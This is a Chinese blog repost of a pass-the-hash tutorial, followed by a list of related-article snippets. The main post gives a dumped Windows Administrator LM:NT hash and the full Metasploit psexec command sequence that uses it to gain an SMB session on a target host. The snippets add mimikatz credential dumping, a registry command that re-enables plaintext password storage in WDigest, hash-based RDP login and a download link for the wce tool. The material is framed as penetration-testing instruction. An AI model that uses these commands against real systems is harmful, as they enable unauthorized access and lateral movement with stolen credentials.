使用Hash直接登录Windows(HASH传递)

最新推荐文章于 2025-04-23 00:57:07 发布
最新推荐文章于 2025-04-23 00:57:07 发布
阅读量514 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/h4ck0ne/p/5154595.html
本文介绍了如何通过抓取windowshash值,利用administrator账户的hash值,通过msf(metasploit framework)调用payload进行smb渗透测试的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

抓取windows hash值

得到administrator的hash:

598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF


msf调用payload:

use exploit/windows/smb/psexec 

show options

set RHOST 192.168.81.129

set SMBPass 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF

set SMBUser Administrator

show options

run

 

转载于:https://www.cnblogs.com/h4ck0ne/p/5154595.html

使用Hash远程RDP登录
谢公子的博客
04-20 4524
我们知道在Windows Server2012及其以后的版本中,使用mimikatz在内存中抓取不到明文密码了,这是微软为了防止内存中泄露明文密码做的一个安全措施。 但是修改注册表后重启依然可以抓取到明文密码,执行如下命令,等待目标机器重启后使用mimikatz即可抓取到明文密码 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1854
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hashAdministratorhash值如下: aad3b435b51404eea
1、使用Hash直接登录Windows
Fly_鹏程万里
05-17 3255
环境攻击机   :  kali linux 2018                        192.168.11.144目标主机Windows server 2003 R2          192.168.11.133主要用途这个可以用于后渗透测试阶段,当我们获取到一个系统的一个WEBshell之后,我们可以上传gethashes.exe到该目标系统,之后在目标系统中获取当前登录用户的...
使用Hash直接登录Windows
十年磨一剑,霜刃未曾试!
10-24 2745
首先,在本地主机(假设为目标主机)  新建一个wooyun用户,并为之设置密码,然后通过gethashes.exe获取到HASH  C:\>net user wooyun test  The command completed successfully.  C:\>gethashes.exe $local  1:1007:C2265B23734E0DACAAD3B435B
Metasploit使用Hash直接登录Windows
jackey3Lin的专栏
10-21 2511
首先,在本地主机(假设为目标主机) 新建一个isosky用户,并为之设置密码,然后通过gethashes.exe获取到HASH C:\>net user isosky test The command completed successfully. C:\>gethashes.exe $local 1:1007:C2265B23734E0DACAAD3B435B51404
WINDOWS传递管理员账号哈希值***
weixin_33755847的博客
12-10 264
在metasploit中只要有密码的哈希值就可以***操作系统了不需要明文密码,下面以实验为目的先用工具wce在操作系统上提取管理员密码的哈希值。下载wcehttp://1230tt.com/download/wce_v1_4beta_x32.zip在目标服务器上进入目录wce -l获取管理密码哈希值1AA818381E4E281BAAD3B435B51404EE:5F18A...
Hash传递攻击Windows2012远程桌面
Coisini的博客
06-15 1372
前言: 小伙伴们还记得metasploit的模块可以使用hash登录windows么,可惜仅仅对XP,2003有效。本文会介绍一种使用hash登录 widnows2012R2服务器远程桌面的方法。是的,你没有看错,使用Hash登录远程桌面!windows2012R2中文版测试通过! windows2012R2采用了新版的远程桌面协议(RDP).本文主要讨论一下新版协议中的”受限管理员”(Rest...
蓝桥杯-网络安全比赛(6) 模拟实验 Metasploit 控制并获取Windows 登录HASH、LM Hash和NTLM Hash密文解析
Superstacks超全栈
05-06 1209
计算机中的每个账号(如果是域服务器,则为域内的每个账号)用户名和密码都存储在sam文件中,当计算机运行时,该文件对所有账号进行锁定,要。这是一个非常重要的设计原则,因为如果密码以明文形式存储,那么任何能够访问存储位置的人或程序都可以轻易地获取到密码,这显然是不安全的。在验证过程中,LSA可能会调用相应的验证程序包(如msv1_0.dll),对用户输入的信息进行处理,并与存储在SAM(安全账户管理器)数据库中的密钥进行对比。最后,winlogon进程对用户登录进行最后的处理,完成整个登录过程。
115_使用 CrackMapExec 进行 NTLM Hash 传递攻击1
08-03
综上所述,这篇内容涵盖了NTLM身份验证的工作原理、NTLM Hash传递攻击的概念、CrackMapExec工具的功能及其在渗透测试中的应用,以及如何使用Mimikatz来获取NTLM Hash。这些知识对于理解网络安全、防御NTLM Hash传递...
凭据传递攻击(Path The Hash)
痴人说梦梦中人
01-29 3924
一、PTH简介        哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。 二、ColbaltStrike实现PTH 获取hash
第15篇:内网横向中windows各端口远程登录哈希传递的方法总结
ABC_123的博客
06-09 3568
Part1 前言随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......
c++ 哈希_传递哈希攻击的原理介绍
weixin_39970064的博客
11-23 335
在渗透测试期间,为了提高审核员对信息系统的权限,很多人都会选择横向移动方法。在这种情况下,称为Pass The Hash(传递哈希)的技术被广泛应用,使审核员成为计算机上的管理员。HTLM协议NTLM协议是在Microsoft环境中使用的一种身份验证协议,特别是,它允许用户向服务器证明自己是谁,以便使用该服务器提供的服务。注意:在本文中,术语“服务器”是在客户端/服务器意义上使用的,“服...
后渗透模块之Hash传递
weixin_45007073的博客
01-26 460
前言 我们有时候获取到了用户hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash登录目标系统。 利用过程 前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块 use exploit/windows/smb/psexec set rhosts 192.168.75.139 set smbuser pyh(普通管理员账户) set smbpass aad3b435b51404eeaad
内网渗透-获取WIN本地用户Hash
小刚的博客
10-27 3539
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 WIN本地获取Hashwin系统密码为什么要获取本地hash几种工具和获取方式注册表 + mimikatzProcdump + mimikatz直接mimikatz读取密码 win系统密码 Windows系统使用LM和NTLM两种方法对用户的密码进行加密处理, 两种密码的加密方式在这有介绍Win本地hash概念 但注意的是从win-server-2008开始默认禁止使用LM加密方式,统一使用NT.
内网渗透:四、windowsRDP-hash传递登录
liu_jia_liang的博客
02-21 6604
windows的RDP-hash登录利用 在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要开启"Restricted Admin Mode", 在Windows8.1和Windows Server 2012R2上默认开启。 一:windows RDP-受限管理模式 Restricted Admin mode简介 官方说明:Restric
内网渗透——哈希传递
来日可期的博客
10-09 1845
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
hash传递(pth)
m0_74326506的博客
09-09 546
hash传递,不需要明文密码即可登陆。
内网渗透之哈希(hash)传递攻击原理及其详解(PTH攻击)
最新发布
2302_80514516的博客
04-23 2273
其实最重要的还是set RHOSTS 192.168.41.10 # 目标:域控(WinServer2012)set SMBUser 域用户B # 域控上的目标用户set SMBDomain wyj.com # 域名set SMBPass 00000000...:H1 # 使用 Win7 提取的哈希值 H1成功的关键就在于你所选择的域控上目标用户和你抓到的哈希值相同,假设都是H1,你在win7上抓到谁的其实无所谓,只要你能确保,你选择的目标用户有足够的权限。
域渗透之明文传递&hash传递
qq_55202378的博客
05-16 724
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里提供一条思路:在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。mimikaze抓取windows用户名、密码。建立IPC常见的错误代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值